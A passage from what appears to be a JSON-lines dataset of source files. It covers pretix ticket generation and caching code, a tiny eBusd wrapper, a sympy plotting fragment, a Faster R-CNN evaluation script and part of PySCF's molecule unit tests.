language(order_position.order.locale):\n responses = register_ticket_outputs.send(order_position.order.event)\n for receiver, response in responses:\n prov = response(order_position.order.event)\n if prov.identifier == provider:\n filename, ttype, data = prov.generate(order_position)\n path, ext = os.path.splitext(filename)\n for ct in CachedTicket.objects.filter(order_position=order_position, provider=provider):\n ct.delete()\n ct = CachedTicket.objects.create(order_position=order_position, provider=provider,\n extension=ext, type=ttype, file=None)\n ct.file.save(filename, ContentFile(data))\n return ct.pk\n\n\ndef generate_order(order: int, provider: str):\n order = Order.objects.select_related('event').get(id=order)\n\n with language(order.locale):\n responses = register_ticket_outputs.send(order.event)\n for receiver, response in responses:\n prov = response(order.event)\n if prov.identifier == provider:\n filename, ttype, data = prov.generate_order(order)\n if ttype == 'text/uri-list':\n continue\n\n path, ext = os.path.splitext(filename)\n for ct in CachedCombinedTicket.objects.filter(order=order, provider=provider):\n ct.delete()\n ct = CachedCombinedTicket.objects.create(order=order, provider=provider, extension=ext,\n type=ttype, file=None)\n ct.file.save(filename, ContentFile(data))\n return ct.pk\n\n\n@app.task(base=ProfiledTask)\ndef generate(model: str, pk: int, provider: str):\n with scopes_disabled():\n if model == 'order':\n return generate_order(pk, provider)\n elif model == 'orderposition':\n return generate_orderposition(pk, provider)\n\n\nclass DummyRollbackException(Exception):\n pass\n\n\ndef preview(event: int, provider: str):\n event = Event.objects.get(id=event)\n\n with rolledback_transaction(), language(event.settings.locale):\n item = event.items.create(name=_(\"Sample product\"), default_price=42.23,\n description=_(\"Sample product description\"))\n item2 = event.items.create(name=_(\"Sample workshop\"), default_price=23.40)\n\n from pretix.base.models import Order\n order = event.orders.create(status=Order.STATUS_PENDING, datetime=now(),\n email='sample@pretix.eu',\n locale=event.settings.locale,\n expires=now(), code=\"PREVIEW1234\", total=119)\n\n scheme = PERSON_NAME_SCHEMES[event.settings.name_scheme]\n sample = {k: str(v) for k, v in scheme['sample'].items()}\n p = order.positions.create(item=item, attendee_name_parts=sample, price=item.default_price)\n s 
= event.subevents.first()\n order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)\n order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)\n\n InvoiceAddress.objects.create(order=order, name_parts=sample, company=_(\"Sample company\"))\n\n responses = register_ticket_outputs.send(event)\n for receiver, response in responses:\n prov = response(event)\n if prov.identifier == provider:\n return prov.generate(p)\n\n\ndef get_tickets_for_order(order, base_position=None):\n can_download = all([r for rr, r in allow_ticket_download.send(order.event, order=order)])\n if not can_download:\n return []\n if not order.ticket_download_available:\n return []\n\n providers = [\n response(order.event)\n for receiver, response\n in register_ticket_outputs.send(order.event)\n ]\n\n tickets = []\n\n positions = list(order.positions_with_tickets)\n if base_position:\n # Only the given position and its children\n positions = [\n p for p in positions if p.pk == base_position.pk or p.addon_to_id == base_position.pk\n ]\n\n for p in providers:\n if not p.is_enabled:\n continue\n\n if p.multi_download_enabled and not base_position:\n try:\n if len(positions) == 0:\n continue\n ct = CachedCombinedTicket.objects.filter(\n order=order, provider=p.identifier, file__isnull=False\n ).last()\n if not ct or not ct.file:\n retval = generate_order(order.pk, p.identifier)\n if not retval:\n continue\n ct = CachedCombinedTicket.objects.get(pk=retval)\n tickets.append((\n \"{}-{}-{}{}\".format(\n order.event.slug.upper(), order.code, ct.provider, ct.extension,\n ),\n ct\n ))\n except:\n logger.exception('Failed to generate ticket.')\n else:\n for pos in positions:\n try:\n ct = CachedTicket.objects.filter(\n order_position=pos, provider=p.identifier, file__isnull=False\n ).last()\n if not ct or not ct.file:\n retval = generate_orderposition(pos.pk, p.identifier)\n if not retval:\n continue\n ct = CachedTicket.objects.get(pk=retval)\n\n if ct.type == 'text/uri-list':\n continue\n\n tickets.append((\n \"{}-{}-{}-{}{}\".format(\n order.event.slug.upper(), order.code, pos.positionid, ct.provider, ct.extension,\n ),\n ct\n ))\n except:\n logger.exception('Failed to generate ticket.')\n\n return tickets\n\n\n@app.task(base=EventTask)\ndef invalidate_cache(event: Event, item: int=None, provider: str=None, order: int=None, **kwargs):\n qs = CachedTicket.objects.filter(order_position__order__event=event)\n qsc = CachedCombinedTicket.objects.filter(order__event=event)\n\n if item:\n qs = qs.filter(order_position__item_id=item)\n\n if provider:\n qs = qs.filter(provider=provider)\n qsc = qsc.filter(provider=provider)\n\n if order:\n qs = qs.filter(order_position__order_id=order)\n qsc = qsc.filter(order_id=order)\n\n for ct in qs:\n ct.delete()\n for ct in qsc:\n ct.delete()\n"} {"ext": "py", "sha": "1a2f76a94c5ed91ed2dc7945d88a25a1c51187d6", "content": "\n\"\"\"A set of wrapper functions for accessing the eBusd API.\"\"\"\n\nfrom .ebusdpy import (init, read, write, raw)\n"} {"ext": "py", "sha": "1a2f770c5e85f92efca2174d52315a2cd4636e73", "content": "p8 = plot_implicit(y - 1, y_var=y)\r\np9 = plot_implicit(x - 1, x_var=x)\r\n"} {"ext": "py", "sha": "1a2f773d17b0bffa95ae6f4c9e858e9bf0c41348", "content": "# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Jiasen Lu, Jianwei Yang, based on code from Ross Girshick\n# 
--------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\nimport os\nimport sys\nimport numpy as np\nimport argparse\nimport pprint\nimport pdb\nimport time\nimport cv2\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.optim as optim\nimport pickle\nfrom roi_data_layer.roidb import combined_roidb\nfrom roi_data_layer.roibatchLoader import roibatchLoader\nfrom model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir\nfrom model.rpn.bbox_transform import clip_boxes\nfrom model.nms.nms_wrapper import nms\nfrom model.rpn.bbox_transform import bbox_transform_inv\nfrom model.utils.net_utils import save_net, load_net, vis_detections\nfrom model.faster_rcnn.vgg16 import vgg16\nfrom model.faster_rcnn.resnet import resnet\n\nimport pdb\n\ntry:\n xrange # Python 2\nexcept NameError:\n xrange = range # Python 3\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Train a Fast R-CNN network')\n parser.add_argument('--dataset', dest='dataset',\n help='training dataset',\n default='pascal_voc', type=str)\n parser.add_argument('--cfg', dest='cfg_file',\n help='optional config file',\n default='cfgs/vgg16.yml', type=str)\n parser.add_argument('--net', dest='net',\n help='vgg16, res50, res101, res152',\n default='res101', type=str)\n parser.add_argument('--set', dest='set_cfgs',\n help='set config keys', default=None,\n nargs=argparse.REMAINDER)\n parser.add_argument('--load_dir', dest='load_dir',\n help='directory to load models', default=\"/srv/share/jyang375/models\",\n type=str)\n parser.add_argument('--cuda', dest='cuda',\n help='whether use CUDA',\n action='store_true')\n parser.add_argument('--ls', dest='large_scale',\n help='whether use large imag scale',\n action='store_true')\n parser.add_argument('--mGPUs', dest='mGPUs',\n help='whether use multiple GPUs',\n action='store_true')\n parser.add_argument('--cag', dest='class_agnostic',\n help='whether perform class_agnostic bbox regression',\n action='store_true')\n parser.add_argument('--parallel_type', dest='parallel_type',\n help='which part of model to parallel, 0: all, 1: model before roi pooling',\n default=0, type=int)\n parser.add_argument('--checksession', dest='checksession',\n help='checksession to load model',\n default=1, type=int)\n parser.add_argument('--checkepoch', dest='checkepoch',\n help='checkepoch to load network',\n default=1, type=int)\n parser.add_argument('--checkpoint', dest='checkpoint',\n help='checkpoint to load network',\n default=10021, type=int)\n parser.add_argument('--vis', dest='vis',\n help='visualization mode',\n action='store_true')\n args = parser.parse_args()\n return args\n\nlr = cfg.TRAIN.LEARNING_RATE\nmomentum = cfg.TRAIN.MOMENTUM\nweight_decay = cfg.TRAIN.WEIGHT_DECAY\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n print('Called with args:')\n print(args)\n\n if torch.cuda.is_available() and not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n np.random.seed(cfg.RNG_SEED)\n if args.dataset == \"pascal_voc\":\n args.imdb_name = \"voc_2007_trainval\"\n args.imdbval_name = \"voc_2007_test\"\n args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"pascal_voc_0712\":\n args.imdb_name = \"voc_2007_trainval+voc_2012_trainval\"\n args.imdbval_name = 
\"voc_2007_test\"\n args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"coco\":\n args.imdb_name = \"coco_2014_train+coco_2014_valminusminival\"\n args.imdbval_name = \"coco_2014_minival\"\n args.set_cfgs = ['ANCHOR_SCALES', '[4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"imagenet\":\n args.imdb_name = \"imagenet_train\"\n args.imdbval_name = \"imagenet_val\"\n args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"imagenet_vid\":\n args.imdb_name = \"imagenet_vid_train+imagenet_det_train\"\n args.imdbval_name = \"imagenet_vid_val\"\n args.set_cfgs = ['ANCHOR_SCALES', '[4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n elif args.dataset == \"vg\":\n args.imdb_name = \"vg_150-50-50_minitrain\"\n args.imdbval_name = \"vg_150-50-50_minival\"\n args.set_cfgs = ['ANCHOR_SCALES', '[4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]']\n\n args.cfg_file = \"cfgs/{}_ls.yml\".format(args.net) if args.large_scale else \"cfgs/{}.yml\".format(args.net)\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n cfg_from_list(args.set_cfgs)\n\n print('Using config:')\n pprint.pprint(cfg)\n\n cfg.TRAIN.USE_FLIPPED = False\n imdb, roidb, ratio_list, ratio_index = combined_roidb(args.imdbval_name, False)\n imdb.competition_mode(on=True)\n\n print('{:d} roidb entries'.format(len(roidb)))\n\n input_dir = args.load_dir + \"/\" + args.net + \"/\" + args.dataset\n if not os.path.exists(input_dir):\n raise Exception('There is no input directory for loading network from ' + input_dir)\n load_name = os.path.join(input_dir,\n 'faster_rcnn_{}_{}_{}.pth'.format(args.checksession, args.checkepoch, args.checkpoint))\n\n # initilize the network here.\n if args.net == 'vgg16':\n fasterRCNN = vgg16(imdb.classes, pretrained=False, class_agnostic=args.class_agnostic)\n elif args.net == 'res101':\n fasterRCNN = resnet(imdb.classes, 101, pretrained=False, class_agnostic=args.class_agnostic)\n elif args.net == 'res50':\n fasterRCNN = resnet(imdb.classes, 50, pretrained=False, class_agnostic=args.class_agnostic)\n elif args.net == 'res152':\n fasterRCNN = resnet(imdb.classes, 152, pretrained=False, class_agnostic=args.class_agnostic)\n else:\n print(\"network is not defined\")\n pdb.set_trace()\n\n fasterRCNN.create_architecture()\n\n print(\"load checkpoint %s\" % (load_name))\n checkpoint = torch.load(load_name)\n fasterRCNN.load_state_dict(checkpoint['model'])\n if 'pooling_mode' in checkpoint.keys():\n cfg.POOLING_MODE = checkpoint['pooling_mode']\n\n\n print('load model successfully!')\n # initilize the tensor holder here.\n im_data = torch.FloatTensor(1)\n im_info = torch.FloatTensor(1)\n num_boxes = torch.LongTensor(1)\n gt_boxes = torch.FloatTensor(1)\n\n # ship to cuda\n if args.cuda:\n im_data = im_data.cuda()\n im_info = im_info.cuda()\n num_boxes = num_boxes.cuda()\n gt_boxes = gt_boxes.cuda()\n\n # make variable\n im_data = Variable(im_data, volatile=True)\n im_info = Variable(im_info, volatile=True)\n num_boxes = Variable(num_boxes, volatile=True)\n gt_boxes = Variable(gt_boxes, volatile=True)\n\n if args.cuda:\n cfg.CUDA = True\n\n if args.cuda:\n fasterRCNN.cuda()\n\n start = time.time()\n max_per_image = 100\n\n vis = args.vis\n\n if vis:\n thresh = 0.05\n else:\n thresh = 0.0\n\n save_name = 'faster_rcnn_10'\n num_images = len(imdb.image_index)\n all_boxes = [[[] for _ in xrange(num_images)]\n for _ in xrange(imdb.num_classes)]\n\n output_dir = 
get_output_dir(imdb, save_name)\n dataset = roibatchLoader(roidb, ratio_list, ratio_index, 1, \\\n imdb.num_classes, training=False, normalize = False)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1,\n shuffle=False, num_workers=0,\n pin_memory=True)\n\n data_iter = iter(dataloader)\n\n _t = {'im_detect': time.time(), 'misc': time.time()}\n det_file = os.path.join(output_dir, 'detections.pkl')\n\n fasterRCNN.eval()\n empty_array = np.transpose(np.array([[],[],[],[],[]]), (1,0))\n for i in range(num_images):\n\n data = next(data_iter)\n im_data.data.resize_(data[0].size()).copy_(data[0])\n im_info.data.resize_(data[1].size()).copy_(data[1])\n gt_boxes.data.resize_(data[2].size()).copy_(data[2])\n num_boxes.data.resize_(data[3].size()).copy_(data[3])\n\n det_tic = time.time()\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label = fasterRCNN(im_data, im_info, gt_boxes, num_boxes)\n\n scores = cls_prob.data\n boxes = rois.data[:, :, 1:5]\n\n if cfg.TEST.BBOX_REG:\n # Apply bounding-box regression deltas\n box_deltas = bbox_pred.data\n if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED:\n # Optionally normalize targets by a precomputed mean and stdev\n if args.class_agnostic:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n box_deltas = box_deltas.view(1, -1, 4)\n else:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n box_deltas = box_deltas.view(1, -1, 4 * len(imdb.classes))\n\n pred_boxes = bbox_transform_inv(boxes, box_deltas, 1)\n pred_boxes = clip_boxes(pred_boxes, im_info.data, 1)\n else:\n # Simply repeat the boxes, once for each class\n pred_boxes = np.tile(boxes, (1, scores.shape[1]))\n\n pred_boxes /= data[1][0][2]\n\n scores = scores.squeeze()\n pred_boxes = pred_boxes.squeeze()\n det_toc = time.time()\n detect_time = det_toc - det_tic\n misc_tic = time.time()\n if vis:\n im = cv2.imread(imdb.image_path_at(i))\n im2show = np.copy(im)\n for j in xrange(1, imdb.num_classes):\n inds = torch.nonzero(scores[:,j]>thresh).view(-1)\n # if there is det\n if inds.numel() > 0:\n cls_scores = scores[:,j][inds]\n _, order = torch.sort(cls_scores, 0, True)\n if args.class_agnostic:\n cls_boxes = pred_boxes[inds, :]\n else:\n cls_boxes = pred_boxes[inds][:, j * 4:(j + 1) * 4]\n \n cls_dets = torch.cat((cls_boxes, cls_scores.unsqueeze(1)), 1)\n # cls_dets = torch.cat((cls_boxes, cls_scores), 1)\n cls_dets = cls_dets[order]\n keep = nms(cls_dets, cfg.TEST.NMS)\n cls_dets = cls_dets[keep.view(-1).long()]\n if vis:\n im2show = vis_detections(im2show, imdb.classes[j], cls_dets.cpu().numpy(), 0.3)\n all_boxes[j][i] = cls_dets.cpu().numpy()\n else:\n all_boxes[j][i] = empty_array\n\n # Limit to max_per_image detections *over all classes*\n if max_per_image > 0:\n image_scores = np.hstack([all_boxes[j][i][:, -1]\n for j in xrange(1, imdb.num_classes)])\n if len(image_scores) > max_per_image:\n image_thresh = np.sort(image_scores)[-max_per_image]\n for j in xrange(1, imdb.num_classes):\n keep = np.where(all_boxes[j][i][:, -1] >= image_thresh)[0]\n all_boxes[j][i] = all_boxes[j][i][keep, :]\n\n misc_toc = time.time()\n nms_time = misc_toc - misc_tic\n\n sys.stdout.write('im_detect: {:d}/{:d} {:.3f}s {:.3f}s \\r' \\\n .format(i + 1, num_images, detect_time, nms_time))\n sys.stdout.flush()\n\n if vis:\n 
cv2.imwrite('result.png', im2show)\n pdb.set_trace()\n #cv2.imshow('test', im2show)\n #cv2.waitKey(0)\n\n with open(det_file, 'wb') as f:\n pickle.dump(all_boxes, f, pickle.HIGHEST_PROTOCOL)\n\n # print('Evaluating detections')\n # imdb.evaluate_detections(all_boxes, output_dir)\n\n end = time.time()\n print(\"test time: %0.4fs\" % (end - start))\n"} {"ext": "py", "sha": "1a2f77a4a0f8500359799f5a5f44fb0998390381", "content": "#!/usr/bin/env python\n# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport copy\nimport unittest\nimport tempfile\nfrom functools import reduce\nimport numpy\nimport scipy.linalg\nfrom pyscf import gto\nfrom pyscf import lib\nimport pyscf.lib.parameters as param\n\nmol0 = gto.Mole()\nmol0.atom = [\n [1 , (0.,1.,1.)],\n [\"O1\", (0.,0.,0.)],\n [1 , (1.,1.,0.)], ]\nmol0.nucmod = { \"O\":'gaussian', 3:'g' }\nmol0.unit = 'ang'\nmol0.basis = {\n \"O\": [(0, 0, (15, 1)), ] + gto.etbs(((0, 4, 1, 1.8),\n (1, 3, 2, 1.8),\n (2, 2, 1, 1.8),)),\n \"H\": [(0, 0, (1, 1, 0), (3, 3, 1), (5, 1, 0)),\n (1, -2, (1, 1)), ]}\nmol0.symmetry = 1\nmol0.charge = 1\nmol0.spin = 1\nmol0.verbose = 7\nmol0.ecp = {'O1': 'lanl2dz'}\nftmp = tempfile.NamedTemporaryFile()\nmol0.output = ftmp.name\nmol0.build()\n\ndef tearDownModule():\n global mol0, ftmp\n mol0.stdout.close()\n del mol0, ftmp\n\nclass KnownValues(unittest.TestCase):\n def test_intor_cross(self):\n mol1 = mol0.unpack(mol0.pack())\n mol1.symmetry = True\n mol1.unit = 'Ang'\n mol1.atom = '''\n 1 0 1 1\n O 0 0 0\n h 1 1 0'''\n mol1.basis = {'O': gto.basis.parse('''\nC S\n 3047.5249000 0.0018347 \n 457.3695100 0.0140373 \n 103.9486900 0.0688426 \n 29.2101550 0.2321844 \n 9.2866630 0.4679413 \n 3.1639270 0.3623120 \n# 1. 
0.1\nC SP\n 7.8682724 -0.1193324 0.0689991 \n 1.8812885 -0.1608542 0.3164240 \n 0.5442493 1.1434564 0.7443083 \nC SP\n 0.1687144 1.0000000 1.0000000'''),\n 'H': '6-31g'}\n mol1.build()\n v = gto.mole.intor_cross('cint1e_ovlp_sph', mol0, mol1)\n self.assertAlmostEqual(numpy.linalg.norm(v), 3.6489423434168562, 1)\n\n def test_num_basis(self):\n self.assertEqual(mol0.nao_nr(), 34)\n self.assertEqual(mol0.nao_2c(), 64)\n\n def test_time_reversal_map(self):\n tao = [ -2, 1, -4, 3, 8, -7, 6, -5,-10, 9,-12, 11,-14, 13,-16, 15,-18, 17,\n 20,-19, 24,-23, 22,-21, 26,-25, 30,-29, 28,-27, 32,-31, 36,-35, 34,-33,\n -40, 39,-38, 37,-46, 45,-44, 43,-42, 41,-50, 49,-48, 47,-56, 55,-54, 53,\n -52, 51,-58, 57,-60, 59, 64,-63, 62,-61]\n self.assertEqual(list(mol0.time_reversal_map()), tao)\n\n def test_check_sanity(self):\n mol1 = mol0.copy()\n mol1.x = None\n mol1.copy = None\n mol1.check_sanity()\n\n def test_nao_range(self):\n self.assertEqual(mol0.nao_nr_range(1,4), (2, 7))\n self.assertEqual(mol0.nao_2c_range(1,4), (4, 12))\n self.assertEqual(numpy.dot(range(mol0.nbas+1), mol0.ao_loc_nr()), 2151)\n self.assertEqual(numpy.dot(range(mol0.nbas+1), mol0.ao_loc_2c()), 4066)\n\n def test_search_bas(self):\n self.assertEqual(mol0.search_shell_id(1, 1), 7)\n self.assertRaises(RuntimeError, mol0.search_ao_nr, 1, 1, -1, 5)\n self.assertEqual(mol0.search_ao_nr(1, 1, -1, 4), 16)\n mol0.cart = True\n self.assertEqual(mol0.search_ao_nr(2, 1, -1, 1), 30)\n mol0.cart = False\n\n def test_atom_types(self):\n atoms = [['H0', ( 0, 0, 0)],\n ['H1', ( 0, 0, 0)],\n ['H', ( 0, 0, 0)],\n ['H3', ( 0, 0, 0)]]\n basis = {'H':'sto3g', 'H1': '6-31g'}\n atmgroup = gto.mole.atom_types(atoms, basis)\n self.assertEqual(atmgroup, {'H': [0, 2, 3], 'H1': [1]})\n atoms = [['H0', ( 0, 0, 0)],\n ['H1', ( 0, 0, 0)],\n ['H2', ( 0, 0, 0)],\n ['H3', ( 0, 0, 0)]]\n basis = {'H2':'sto3g', 'H3':'6-31g', 'H0':'sto3g', 'H1': '6-31g'}\n atmgroup = gto.mole.atom_types(atoms, basis)\n self.assertEqual(atmgroup, {'H2': [2], 'H3': [3], 'H0': [0], 'H1': [1]})\n\n def test_given_symmetry(self):\n mol = gto.M(atom='H 0 0 -1; H 0 0 1', symmetry='D2h')\n self.assertEqual(mol.irrep_id, [0, 5])\n mol = gto.M(atom='H 0 0 -1; H 0 0 1', symmetry='D2')\n self.assertEqual(mol.irrep_id, [0, 1])\n mol = gto.M(atom='H 0 0 -1; H 0 0 1', symmetry='C2v')\n self.assertEqual(mol.irrep_id, [0])\n\n def test_dumps_loads(self):\n import warnings\n mol1 = gto.M()\n mol1.x = lambda *args: None\n with warnings.catch_warnings(record=True) as w:\n warnings.simplefilter(\"always\")\n d = mol1.dumps()\n self.assertTrue(w[0].category, UserWarning)\n mol1.loads(mol0.dumps())\n\n def test_symm_orb_serialization(self):\n '''Handle the complex symmetry-adapted orbitals'''\n mol = gto.M(atom='He', basis='ccpvdz', symmetry=True)\n mol.loads(mol.dumps())\n\n lz_minus = numpy.sqrt(.5) * (mol.symm_orb[3] - mol.symm_orb[2] * 1j)\n lz_plus = -numpy.sqrt(.5) * (mol.symm_orb[3] + mol.symm_orb[2] * 1j)\n mol.symm_orb[2] = lz_minus\n mol.symm_orb[3] = lz_plus\n mol.loads(mol.dumps())\n self.assertTrue(mol.symm_orb[0].dtype == numpy.double)\n self.assertTrue(mol.symm_orb[2].dtype == numpy.complex128)\n self.assertTrue(mol.symm_orb[3].dtype == numpy.complex128)\n\n def test_same_mol1(self):\n self.assertTrue(gto.same_mol(mol0, mol0))\n mol1 = gto.M(atom='h 0 1 1; O1 0 0 0; h 1 1 0')\n self.assertTrue(not gto.same_mol(mol0, mol1))\n self.assertTrue(gto.same_mol(mol0, mol1, cmp_basis=False))\n\n mol1 = gto.M(atom='h 0 1 1; O1 0 0 0; h 1 1 0.01')\n self.assertTrue(not gto.same_mol(mol0, mol1, 
cmp_basis=False))\n self.assertTrue(gto.same_mol(mol0, mol1, tol=.02, cmp_basis=False))\n\n mol1 = gto.M(atom='''H 0.0052917700 0.0000000000 -0.8746076326\n F 0.0000000000 0.0000000000 0.0516931447''')\n mol2 = gto.M(atom='''H 0.0000000000 0.0000000000 -0.8746076326\n F 0.0000000000 0.0000000000 0.0516931447''')\n self.assertTrue(gto.same_mol(mol1, mol2))\n self.assertTrue(not gto.same_mol(mol1, mol2, tol=1e-6))\n mol3 = gto.M(atom='''H 0.0000000000 0.0000000000 -0.8746076326\n H 0.0000000000 0.0000000000 0.0516931447''')\n self.assertTrue(not gto.same_mol(mol3, mol2))\n\n def test_same_mol2(self):\n mol1 = gto.M(atom='H 0.0052917700 0.0000000000 -0.8746076326; F 0.0000000000 0.0000000000 0.0464013747')\n mol2 = gto.M(atom='H 0.0000000000 0.0000000000 -0.8746076326; F 0.0052917700 0.0000000000 0.0464013747')\n self.assertTrue(gto.same_mol(mol1, mol2))\n\n mol1 = gto.M(atom='H 0.0052917700 0.0000000000 -0.8693158626; F 0.0000000000 0.0000000000 0.0464013747')\n mol2 = gto.M(atom='H 0.0000000000 0.0052917700 -0.8693158626; F 0.0000000000 0.0000000000 0.0464013747')\n mol3 = gto.M(atom='H 0.0000000000 0.0000000000 -0.8693158626; F 0.0052917700 0.0000000000 0.0464013747')\n mol4 = gto.M(atom='H -0.0052917700 0.0000000000 -0.8746076326; F 0.0000000000 0.0000000000 0.0411096047')\n mols = (mol1, mol2, mol3, mol4)\n for i,mi in enumerate(mols):\n for j in range(i):\n self.assertTrue(gto.same_mol(mols[i], mols[j]))\n\n mol1 = gto.M(atom='''H 0.0000000000 0.0000000000 0.0000000000\n H 0.9497795800 1.3265673200 0.0000000000\n H 0.9444878100 -1.3265673200 0.0000000000\n H1 -0.9444878100 0.0000000000 1.3265673200\n H1 -0.9444878100 0.0000000000 -1.3265673200''', basis={'H':'sto3g', 'H1':'sto3g'}, charge=1)\n mol2 = gto.M(atom='''H 0.0000000000 0.0000000000 0.0000000000\n H 0.9444878100 1.3265673200 0.0000000000\n H 0.9497795800 -1.3265673200 0.0000000000\n H1 -0.9444878100 0.0000000000 1.3265673200\n H1 -0.9444878100 0.0000000000 -1.3265673200''', basis={'H':'sto3g', 'H1':'sto3g'}, charge=1)\n self.assertTrue(gto.same_mol(mol1, mol2))\n self.assertEqual(len(gto.atom_types(mol1._atom)), 2)\n mol3 = gto.M(atom='''H 0.0000000000 0.0000000000 0.0000000000\n H1 0.9497795800 1.3265673200 0.0000000000\n H1 0.9444878100 -1.3265673200 0.0000000000\n H1 -0.9444878100 0.0000000000 1.3265673200\n H1 -0.9444878100 0.0000000000 -1.3265673200''', basis={'H':'sto3g', 'H1':'321g'}, charge=1)\n self.assertTrue(not gto.same_mol(mol3, mol2))\n\n def test_inertia_momentum(self):\n mol1 = gto.Mole()\n mol1.atom = mol0.atom\n mol1.nucmod = 'G'\n mol1.verbose = 5\n mol1.nucprop = {'H': {'mass': 3}}\n mol1.output = '/dev/null'\n mol1.build(False, False)\n self.assertAlmostEqual(lib.finger(gto.inertia_moment(mol1)),\n 2.139593709454326, 9)\n\n mass = mol0.atom_mass_list(isotope_avg=True)\n self.assertAlmostEqual(lib.finger(gto.inertia_moment(mol1, mass)),\n 2.1549269955776205, 9)\n\n def test_chiral_mol(self):\n mol1 = gto.M(atom='C 0 0 0; H 1 1 1; He -1 -1 1; Li -1 1 -1; Be 1 -1 -1')\n mol2 = gto.M(atom='C 0 0 0; H 1 1 1; He -1 -1 1; Be -1 1 -1; Li 1 -1 -1')\n self.assertTrue(gto.chiral_mol(mol1, mol2))\n self.assertTrue(gto.chiral_mol(mol1))\n\n mol1 = gto.M(atom='''H 0.9444878100 1.3265673200 0.0052917700\n H 0.9444878100 -1.3265673200 0.0000000000\n H -0.9444878100 0.0000000000 1.3265673200\n H -0.9444878100 0.0000000000 -1.3265673200''')\n mol2 = gto.M(atom='''H 0.9444878100 1.3265673200 0.0000000000\n H 0.9444878100 -1.3265673200 0.0052917700\n H -0.9444878100 0.0000000000 1.3265673200\n H -0.9444878100 0.0000000000 
-1.3265673200''')\n self.assertTrue(gto.chiral_mol(mol1, mol2))\n\n mol1 = gto.M(atom='''H 0.9444878100 1.3265673200 0.0052917700\n H 0.9444878100 -1.3265673200 0.0000000000\n H -0.9444878100 0.0000000000 1.3265673200\n H -0.9444878100 0.0000000000 -1.3265673200''')\n self.assertTrue(gto.chiral_mol(mol1))\n\n def test_first_argument(self):\n mol1 = gto.Mole()\n mol1.build('He')\n self.assertEqual(mol1.natm, 1)\n\n def test_atom_as_file(self):\n ftmp = tempfile.NamedTemporaryFile('w')\n # file in xyz format\n ftmp.write('He 0 0 0\\nHe 0 0 1\\n')\n ftmp.flush()\n mol1 = gto.M(atom=ftmp.name)\n self.assertEqual(mol1.natm, 2)\n\n # file in zmatrix format\n ftmp = tempfile.NamedTemporaryFile('w')\n ftmp.write('He\\nHe 1 1.5\\n')\n ftmp.flush()\n mol1 = gto.M(atom=ftmp.name)\n self.assertEqual(mol1.natm, 2)\n\n def test_format_atom(self):\n atoms = [['h' , 0,1,1], \"O1 0. 0. 0.\", [1, 1.,1.,0.],]\n self.assertTrue(numpy.allclose(gto.mole.format_atom(atoms, unit='Ang')[0][1],\n [0.0, 1.8897261245650618, 1.8897261245650618]))\n atoms = '''h 0 1 1\n O1 0 0 0; 1 1 1 0; #H 0 0 3'''\n self.assertTrue(numpy.allclose(gto.mole.format_atom(atoms, unit=1)[0][1],\n [0.0, 1., 1.]))\n atoms = 'O1; h 1 1; 1 1 1 2 90'\n atoms = gto.mole.format_atom(atoms, unit=1)[2]\n self.assertEqual(atoms[0], 'H')\n self.assertTrue(numpy.allclose(atoms[1], [0, 0, 1.]))\n\n def test_format_basis(self):\n mol = gto.M(atom = '''O 0 0 0; 1 0 1 0; H 0 0 1''',\n basis = {8: 'ccpvdz'})\n self.assertEqual(mol.nao_nr(), 14)\n\n mol = gto.M(atom = '''O 0 0 0; H:1 0 1 0; H@2 0 0 1''',\n basis = {'O': 'ccpvdz', 'H:1': 'sto3g', 'H': 'unc-iglo3'})\n self.assertEqual(mol.nao_nr(), 32)\n\n mol = gto.M(\n atom = '''O 0 0 0; H1 0 1 0; H2 0 0 1''',\n basis = {'default': ('6-31g', [[0, [.05, 1.]], []]), 'H2': 'sto3g'}\n )\n self.assertEqual(mol.nao_nr(), 14)\n\n mol = gto.M(\n atom = '''O 0 0 0; H1 0 1 0; H2 0 0 1''',\n basis = {'H1': gto.parse('''\n# Parse NWChem format basis string (see https://bse.pnl.gov/bse/portal).\n# Comment lines are ignored\n#BASIS SET: (6s,3p) -> 